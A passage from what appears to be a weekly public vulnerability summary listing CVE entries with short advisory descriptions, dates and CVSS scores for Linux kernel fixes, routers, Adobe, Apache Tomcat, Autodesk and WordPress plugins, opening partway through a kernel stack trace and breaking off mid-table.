__fput_sync+0x1d/0x30 [ 143.574574] nfsd_filp_close+0x33/0x60 [nfsd] [ 143.575430] nfsd_file_free+0x96/0x150 [nfsd] [ 143.576274] nfsd_file_put+0xf7/0x1a0 [nfsd] [ 143.577104] nfsd_file_put_local+0x18/0x30 [nfsd] [ 143.578070] nfs_close_local_fh+0x101/0x110 [nfs_localio] [ 143.579079] __put_nfs_open_context+0xc9/0x180 [nfs] [ 143.580031] nfs_file_clear_open_context+0x4a/0x60 [nfs] [ 143.581038] nfs_file_release+0x3e/0x60 [nfs] [ 143.581879] __fput+0xe8/0x2d0 [ 143.582464] __fput_sync+0x1d/0x30 [ 143.583108] __x64_sys_close+0x41/0x80 [ 143.583823] x64_sys_call+0x189a/0x20d0 [ 143.584552] do_syscall_64+0x64/0x170 [ 143.585240] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 143.586185] RIP: 0033:0x7f3c5153efd7 | 2024-12-29 | not yet calculated | CVE-2024-56743 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid potential deadlock in f2fs_record_stop_reason() syzbot reports deadlock issue of f2fs as below: ====================================================== WARNING: possible circular locking dependency detected 6.12.0-rc3-syzkaller-00087-gc964ced77262 #0 Not tainted ------------------------------------------------------ kswapd0/79 is trying to acquire lock: ffff888011824088 (&sbi->sb_lock){++++}-{3:3}, at: f2fs_down_write fs/f2fs/f2fs.h:2199 [inline] ffff888011824088 (&sbi->sb_lock){++++}-{3:3}, at: f2fs_record_stop_reason+0x52/0x1d0 fs/f2fs/super.c:4068 but task is already holding lock: ffff88804bd92610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x662/0x15c0 fs/f2fs/inode.c:842 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #2 (sb_internal#2){.+.+}-{0:0}: lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5825 percpu_down_read include/linux/percpu-rwsem.h:51 [inline] __sb_start_write include/linux/fs.h:1716 [inline] sb_start_intwrite+0x4d/0x1c0 include/linux/fs.h:1899 f2fs_evict_inode+0x662/0x15c0 fs/f2fs/inode.c:842 evict+0x4e8/0x9b0 fs/inode.c:725 f2fs_evict_inode+0x1a4/0x15c0 fs/f2fs/inode.c:807 evict+0x4e8/0x9b0 fs/inode.c:725 dispose_list fs/inode.c:774 [inline] prune_icache_sb+0x239/0x2f0 fs/inode.c:963 super_cache_scan+0x38c/0x4b0 fs/super.c:223 do_shrink_slab+0x701/0x1160 mm/shrinker.c:435 shrink_slab+0x1093/0x14d0 mm/shrinker.c:662 shrink_one+0x43b/0x850 mm/vmscan.c:4818 shrink_many mm/vmscan.c:4879 [inline] lru_gen_shrink_node mm/vmscan.c:4957 [inline] shrink_node+0x3799/0x3de0 mm/vmscan.c:5937 kswapd_shrink_node mm/vmscan.c:6765 [inline] balance_pgdat mm/vmscan.c:6957 [inline] kswapd+0x1ca3/0x3700 mm/vmscan.c:7226 kthread+0x2f0/0x390 kernel/kthread.c:389 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 -> #1 (fs_reclaim){+.+.}-{0:0}: lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5825 __fs_reclaim_acquire mm/page_alloc.c:3834 [inline] fs_reclaim_acquire+0x88/0x130 mm/page_alloc.c:3848 might_alloc include/linux/sched/mm.h:318 [inline] prepare_alloc_pages+0x147/0x5b0 mm/page_alloc.c:4493 __alloc_pages_noprof+0x16f/0x710 mm/page_alloc.c:4722 alloc_pages_mpol_noprof+0x3e8/0x680 mm/mempolicy.c:2265 alloc_pages_noprof mm/mempolicy.c:2345 [inline] folio_alloc_noprof+0x128/0x180 mm/mempolicy.c:2352 filemap_alloc_folio_noprof+0xdf/0x500 mm/filemap.c:1010 do_read_cache_folio+0x2eb/0x850 mm/filemap.c:3787 read_mapping_folio include/linux/pagemap.h:1011 [inline] f2fs_commit_super+0x3c0/0x7d0 fs/f2fs/super.c:4032 f2fs_record_stop_reason+0x13b/0x1d0 fs/f2fs/super.c:4079 f2fs_handle_critical_error+0x2ac/0x5c0 fs/f2fs/super.c:4174 f2fs_write_inode+0x35f/0x4d0 fs/f2fs/inode.c:785 write_inode fs/fs-writeback.c:1503 [inline] __writeback_single_inode+0x711/0x10d0 fs/fs-writeback.c:1723 writeback_single_inode+0x1f3/0x660 fs/fs-writeback.c:1779 sync_inode_metadata+0xc4/0x120 fs/fs-writeback.c:2849 f2fs_release_file+0xa8/0x100 fs/f2fs/file.c:1941 __fput+0x23f/0x880 fs/file_table.c:431 task_work_run+0x24f/0x310 kernel/task_work.c:228 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop kernel/entry/common.c:114 [inline] exit_to_user_mode_prepare include/linux/entry-common.h:328 [inline] __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline] syscall_exit_to_user_mode+0x168/0x370 kernel/entry/common.c:218 do_syscall_64+0x100/0x230 arch/x86/entry/common.c:89 entry_SYSCALL_64_after_hwframe+0x77/0x7f ---truncated--- | 2024-12-29 | not yet calculated | CVE-2024-56744 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: Fix reset_method_store() memory leak In reset_method_store(), a string is allocated via kstrndup() and assigned to the local "options". options is then used in with strsep() to find spaces: while ((name = strsep(&options, " ")) != NULL) { If there are no remaining spaces, then options is set to NULL by strsep(), so the subsequent kfree(options) doesn't free the memory allocated via kstrndup(). Fix by using a separate tmp_options to iterate with strsep() so options is preserved. | 2024-12-29 | not yet calculated | CVE-2024-56745 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: fbdev: sh7760fb: Fix a possible memory leak in sh7760fb_alloc_mem() When information such as info->screen_base is not ready, calling sh7760fb_free_mem() does not release memory correctly. Call dma_free_coherent() instead. | 2024-12-29 | not yet calculated | CVE-2024-56746 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: qedi: Fix a possible memory leak in qedi_alloc_and_init_sb() Hook "qedi_ops->common->sb_init = qed_sb_init" does not release the DMA memory sb_virt when it fails. Add dma_free_coherent() to free it. This is the same way as qedr_alloc_mem_sb() and qede_alloc_mem_sb(). | 2024-12-29 | not yet calculated | CVE-2024-56747 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: qedf: Fix a possible memory leak in qedf_alloc_and_init_sb() Hook "qed_ops->common->sb_init = qed_sb_init" does not release the DMA memory sb_virt when it fails. Add dma_free_coherent() to free it. This is the same way as qedr_alloc_mem_sb() and qede_alloc_mem_sb(). | 2024-12-29 | not yet calculated | CVE-2024-56748 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dlm: fix dlm_recover_members refcount on error If dlm_recover_members() fails we don't drop the references of the previous created root_list that holds and keep all rsbs alive during the recovery. It might be not an unlikely event because ping_members() could run into an -EINTR if another recovery progress was triggered again. | 2024-12-29 | not yet calculated | CVE-2024-56749 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: erofs: fix blksize < PAGE_SIZE for file-backed mounts Adjust sb->s_blocksize{,_bits} directly for file-backed mounts when the fs block size is smaller than PAGE_SIZE. Previously, EROFS used sb_set_blocksize(), which caused a panic if bdev-backed mounts is not used. | 2024-12-29 | not yet calculated | CVE-2024-56750 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipv6: release nexthop on device removal The CI is hitting some aperiodic hangup at device removal time in the pmtu.sh self-test: unregister_netdevice: waiting for veth_A-R1 to become free. Usage count = 6 ref_tracker: veth_A-R1@ffff888013df15d8 has 1/5 users at dst_init+0x84/0x4a0 dst_alloc+0x97/0x150 ip6_dst_alloc+0x23/0x90 ip6_rt_pcpu_alloc+0x1e6/0x520 ip6_pol_route+0x56f/0x840 fib6_rule_lookup+0x334/0x630 ip6_route_output_flags+0x259/0x480 ip6_dst_lookup_tail.constprop.0+0x5c2/0x940 ip6_dst_lookup_flow+0x88/0x190 udp_tunnel6_dst_lookup+0x2a7/0x4c0 vxlan_xmit_one+0xbde/0x4a50 [vxlan] vxlan_xmit+0x9ad/0xf20 [vxlan] dev_hard_start_xmit+0x10e/0x360 __dev_queue_xmit+0xf95/0x18c0 arp_solicit+0x4a2/0xe00 neigh_probe+0xaa/0xf0 While the first suspect is the dst_cache, explicitly tracking the dst owing the last device reference via probes proved such dst is held by the nexthop in the originating fib6_info. Similar to commit f5b51fe804ec ("ipv6: route: purge exception on removal"), we need to explicitly release the originating fib info when disconnecting a to-be-removed device from a live ipv6 dst: move the fib6_info cleanup into ip6_dst_ifdown(). Tested running: ./pmtu.sh cleanup_ipv6_exception in a tight loop for more than 400 iterations with no spat, running an unpatched kernel I observed a splat every ~10 iterations. | 2024-12-29 | not yet calculated | CVE-2024-56751 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/nouveau/gr/gf100: Fix missing unlock in gf100_gr_chan_new() When the call to gf100_grctx_generate() fails, unlock gr->fecs.mutex before returning the error. Fixes smatch warning: drivers/gpu/drm/nouveau/nvkm/engine/gr/gf100.c:480 gf100_gr_chan_new() warn: inconsistent returns '&gr->fecs.mutex'. | 2024-12-29 | not yet calculated | CVE-2024-56752 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/gfx9: Add Cleaner Shader Deinitialization in gfx_v9_0 Module This commit addresses an omission in the previous patch related to the cleaner shader support for GFX9 hardware. Specifically, it adds the necessary deinitialization code for the cleaner shader in the gfx_v9_0_sw_fini function. The added line amdgpu_gfx_cleaner_shader_sw_fini(adev); ensures that any allocated resources for the cleaner shader are freed correctly, avoiding potential memory leaks and ensuring that the GPU state is clean for the next initialization sequence. | 2024-12-29 | not yet calculated | CVE-2024-56753 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: crypto: caam - Fix the pointer passed to caam_qi_shutdown() The type of the last parameter given to devm_add_action_or_reset() is "struct caam_drv_private *", but in caam_qi_shutdown(), it is casted to "struct device *". Pass the correct parameter to devm_add_action_or_reset() so that the resources are released as expected. | 2024-12-29 | not yet calculated | CVE-2024-56754 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netfs/fscache: Add a memory barrier for FSCACHE_VOLUME_CREATING In fscache_create_volume(), there is a missing memory barrier between the bit-clearing operation and the wake-up operation. This may cause a situation where, after a wake-up, the bit-clearing operation hasn't been detected yet, leading to an indefinite wait. The triggering process is as follows: [cookie1] [cookie2] [volume_work] fscache_perform_lookup fscache_create_volume fscache_perform_lookup fscache_create_volume fscache_create_volume_work cachefiles_acquire_volume clear_and_wake_up_bit test_and_set_bit test_and_set_bit goto maybe_wait goto no_wait In the above process, cookie1 and cookie2 has the same volume. When cookie1 enters the -no_wait- process, it will clear the bit and wake up the waiting process. If a barrier is missing, it may cause cookie2 to remain in the -wait- process indefinitely. In commit 3288666c7256 ("fscache: Use clear_and_wake_up_bit() in fscache_create_volume_work()"), barriers were added to similar operations in fscache_create_volume_work(), but fscache_create_volume() was missed. By combining the clear and wake operations into clear_and_wake_up_bit() to fix this issue. | 2024-12-29 | not yet calculated | CVE-2024-56755 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nvme-pci: fix freeing of the HMB descriptor table The HMB descriptor table is sized to the maximum number of descriptors that could be used for a given device, but __nvme_alloc_host_mem could break out of the loop earlier on memory allocation failure and end up using less descriptors than planned for, which leads to an incorrect size passed to dma_free_coherent. In practice this was not showing up because the number of descriptors tends to be low and the dma coherent allocator always allocates and frees at least a page. | 2024-12-29 | not yet calculated | CVE-2024-56756 |
| n/a -- n/a |
A vulnerability was found in python-sql where unary operators do not escape non-Expression. | 2024-12-27 | not yet calculated | CVE-2024-9774 |
| n/a--n/a |
The Crypt::Random::Source package before 0.13 for Perl has a fallback to the built-in rand() function, which is not a secure source of random bits. | 2024-12-29 | not yet calculated | CVE-2018-25107 |
| Oracle Corporation--Oracle iStore |
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, 12.2.7 and 12.2.8. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle iStore accessible data as well as unauthorized update, insert or delete access to some of Oracle iStore accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). | 2024-12-24 | not yet calculated | CVE-2019-2483 |
| Sharp Corporation--home 5G HR02 |
home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STATION SH-54C contain an OS command injection vulnerability in the HOST name configuration screen. An arbitrary OS command may be executed with the root privilege by an administrative user. | 2024-12-23 | not yet calculated | CVE-2024-45721 |
| Sharp Corporation--home 5G HR02 |
Multiple SHARP routers leave the hidden debug function enabled. An arbitrary OS command may be executed with the root privilege by a remote unauthenticated attacker. | 2024-12-23 | not yet calculated | CVE-2024-46873 |
| Sharp Corporation--home 5G HR02 |
home 5G HR02, Wi-Fi STATION SH-52B, and Wi-Fi STATION SH-54C contain a buffer overflow vulnerability in the hidden debug function. A remote unauthenticated attacker may get the web console of the product down. | 2024-12-23 | not yet calculated | CVE-2024-47864 |
| Sharp Corporation--home 5G HR02 |
Multiple SHARP routers contain an improper authentication vulnerability in the configuration backup function. The product's backup files containing sensitive information may be retrieved by a remote unauthenticated attacker. | 2024-12-23 | not yet calculated | CVE-2024-52321 |
| Sharp Corporation--home 5G HR02 |
home 5G HR02 and Wi-Fi STATION SH-54C contain an OS command injection vulnerability in the configuration restore function. An arbitrary OS command may be executed with the root privilege by an administrative user. | 2024-12-23 | not yet calculated | CVE-2024-54082 |
Vulnerability Summary for the Week of December 16, 2024
Posted on Monday December 23, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Attendance Tracking Management System |
A vulnerability has been found in 1000 Projects Attendance Tracking Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /student/check_student_login.php. The manipulation of the argument student_emailid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 7.3 | CVE-2024-12787 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 7.8 | CVE-2022-44512 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 7.8 | CVE-2022-44513 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 7.8 | CVE-2022-44514 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 7.8 | CVE-2022-44518 |
| Adobe--Acrobat Reader |
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-12-19 | 7.8 | CVE-2022-44520 |
| Aleksander Novikov--Metrika |
Cross-Site Request Forgery (CSRF) vulnerability in Aleksander Novikov Metrika allows Cross Site Request Forgery.This issue affects Metrika: from n/a through 1.2. | 2024-12-16 | 7.1 | CVE-2024-54420 |
| Alok Tiwari--Amazon Product Price |
Cross-Site Request Forgery (CSRF) vulnerability in Alok Tiwari Amazon Product Price allows Stored XSS.This issue affects Amazon Product Price: from n/a through 1.1. | 2024-12-16 | 7.1 | CVE-2024-54439 |
| Amol Nirmala Waman--Navayan CSV Export |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Amol Nirmala Waman Navayan CSV Export allows Blind SQL Injection.This issue affects Navayan CSV Export: from n/a through 1.0.9. | 2024-12-16 | 9.3 | CVE-2024-55988 |
| AMS Nexe Iberica--Mimoos |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AMS Nexe Iberica Mimoos allows SQL Injection.This issue affects Mimoos: from n/a through 1.2. | 2024-12-16 | 8.5 | CVE-2024-55974 |
| Andy Chapman--ECT Social Share |
Cross-Site Request Forgery (CSRF) vulnerability in Andy Chapman ECT Social Share allows Stored XSS.This issue affects ECT Social Share: from n/a through 1.3. | 2024-12-16 | 7.1 | CVE-2024-54405 |
| Andy Fradelakis--LeaderBoard Plugin |
Cross-Site Request Forgery (CSRF) vulnerability in Andy Fradelakis LeaderBoard Plugin allows Stored XSS.This issue affects LeaderBoard Plugin: from n/a through 1.2.4. | 2024-12-16 | 7.1 | CVE-2024-54426 |
| Antonio Gocaj--Go Animate |
Cross-Site Request Forgery (CSRF) vulnerability in Antonio Gocaj Go Animate allows Stored XSS.This issue affects Go Animate: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54397 |
| Apache Software Foundation--Apache Tomcat |
Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. | 2024-12-17 | 9.8 | CVE-2024-50379 |
| Apple--macOS |
A logic issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.1. An app may be able to read arbitrary files. | 2024-12-20 | 7.5 | CVE-2024-44195 |
| Apple--macOS |
This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Sequoia 15.1. An app may be able to access user-sensitive data. | 2024-12-20 | 7.5 | CVE-2024-44211 |
| Apple--macOS |
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.1. A person with physical access to a Mac may be able to bypass Login Window during a software update. | 2024-12-20 | 7.5 | CVE-2024-44231 |
| Apple--macOS |
A denial-of-service issue was addressed with improved input validation. This issue is fixed in visionOS 2.1, iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, tvOS 18.1, macOS Sonoma 14.7.1, watchOS 11.1, macOS Ventura 13.7.1. A remote attacker may be able to cause a denial-of-service. | 2024-12-20 | 7.5 | CVE-2024-54538 |
| Asseco Business Solutions S.A.--Wapro ERP Desktop |
Wapro ERP Desktop is vulnerable to MS SQL protocol downgrade request from a server side, what could lead to an unencrypted communication vulnerable to data interception and modification. This issue affects Wapro ERP Desktop versions before 9.00.0. | 2024-12-18 | 9.8 | CVE-2024-4995 |
| Asseco Business Solutions S.A.--Wapro ERP Desktop |
Use of a hard-coded password for a database administrator account created during Wapro ERP installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Wapro ERP installations. This issue affects Wapro ERP Desktop versions before 8.90.0. | 2024-12-18 | 9.8 | CVE-2024-4996 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-11422 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12178 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12179 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12191 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWF file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12192 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12193 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12194 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12197 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12198 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12199 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12200 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12669 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWF file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12670 |
| Autodesk--Navisworks Freedom |
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-17 | 7.8 | CVE-2024-12671 |
| Avatar 3D Creator--3D Avatar User Profile |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Avatar 3D Creator 3D Avatar User Profile allows Reflected XSS.This issue affects 3D Avatar User Profile: from n/a through 1.0.0. | 2024-12-16 | 7.1 | CVE-2024-54358 |
| axeptio--Axeptio |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axeptio Axeptio allows PHP Local File Inclusion.This issue affects Axeptio: from n/a through 2.5.3. | 2024-12-18 | 8.1 | CVE-2024-54270 |
| Becky Sanders--Increase Sociability |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Becky Sanders Increase Sociability allows Reflected XSS.This issue affects Increase Sociability: from n/a through 1.3.0. | 2024-12-16 | 7.1 | CVE-2024-54395 |
| Becton Dickinson & Co--BD BACTEC Blood Culture System |
Default credentials are used in the above listed BD Diagnostic Solutions products. If exploited, threat actors may be able to access, modify or delete data, including sensitive information such as protected health information (PHI) and personally identifiable information (PII). Exploitation of this vulnerability may allow an attacker to shut down or otherwise impact the availability of the system. Note: BD Synapsysâ„¢ Informatics Solution is only in scope of this vulnerability when installed on a NUC server. BD Synapsysâ„¢ Informatics Solution installed on a customer-provided virtual machine or on the BD Kiestraâ„¢ SCU hardware is not in scope. | 2024-12-17 | 8 | CVE-2024-10476 |
| beyondtrust -- privileged_remote_access |
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. | 2024-12-17 | 9.8 | CVE-2024-12356 |
| Blokhaus--Minterpress |
Missing Authorization vulnerability in Blokhaus Minterpress allows Privilege Escalation.This issue affects Minterpress: from n/a through 1.0.5. | 2024-12-16 | 8.8 | CVE-2024-54379 |
| blueskyy--WP-Ban-User |
Cross-Site Request Forgery (CSRF) vulnerability in blueskyy WP-Ban-User allows Stored XSS.This issue affects WP-Ban-User: from n/a through 1.0. | 2024-12-16 | 7.1 | CVE-2024-54440 |
| Bouzid Nazim Zitouni--TagGator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bouzid Nazim Zitouni TagGator allows Reflected XSS.This issue affects TagGator: from n/a through 1.54. | 2024-12-16 | 7.1 | CVE-2024-54390 |
| Broadcom--CA Client Automation (ITCM) |
CA Client Automation (ITCM) allows non-admin/non-root users to encrypt a string using CAF CLI and SD_ACMD CLI. This would allow the non admin user to access the critical encryption keys which further causes the exploitation of stored credentials. This fix doesn't allow a non-admin/non-root user to execute "caf encrypt"/"sd_acmd encrypt" commands. | 2024-12-17 | 8.8 | CVE-2024-38499 |
| Chris Carvache--eTemplates |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Chris Carvache eTemplates allows SQL Injection.This issue affects eTemplates: from n/a through 0.2.1. | 2024-12-16 | 9.3 | CVE-2024-55972 |
| Chris Grdenberg, MultiNet Interactive AB--EduAdmin Booking |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Chris GÃ¥rdenberg, MultiNet Interactive AB EduAdmin Booking allows PHP Local File Inclusion.This issue affects EduAdmin Booking: from n/a through 5.2.0. | 2024-12-16 | 7.5 | CVE-2024-54373 |
| Chunghwa Telecom--tbm-client |
The tbm-client from Chunghwa Telecom has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system. | 2024-12-16 | 8.1 | CVE-2024-12643 |
| Chunghwa Telecom--tbm-client |
The tbm-client from Chunghwa Telecom has an Arbitrary File vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes. | 2024-12-16 | 7.1 | CVE-2024-12644 |
| Chunghwa Telecom--TenderDocTransfer |
TenderDocTransfer from Chunghwa Telecom has a Reflected Cross-site scripting vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use specific APIs through phishing to execute arbitrary JavaScript code in the user's browser. Since the web server set by the application supports Node.Js features, attackers can further leverage this to run OS commands. | 2024-12-16 | 9.6 | CVE-2024-12641 |
| Chunghwa Telecom--TenderDocTransfer |
TenderDocTransfer from Chunghwa Telecom has an Arbitrary File Write vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains a Relative Path Traversal vulnerability, allowing attackers to write arbitrary files to any path on the user's system. | 2024-12-16 | 8.1 | CVE-2024-12642 |
| Chunghwa Telecom--topm-client |
The topm-client from Chunghwa Telecom has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system. | 2024-12-16 | 8.1 | CVE-2024-12646 |
| clavaque--s2Member Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions |
The s2Member - Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 241114 via the 'sc_get_details' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including user data and database configuration information, which can lead to reading, updating, or dropping database tables. The vulnerability was partially patched in version 241114. | 2024-12-17 | 8.8 | CVE-2024-8326 |
| codename065--Download Manager |
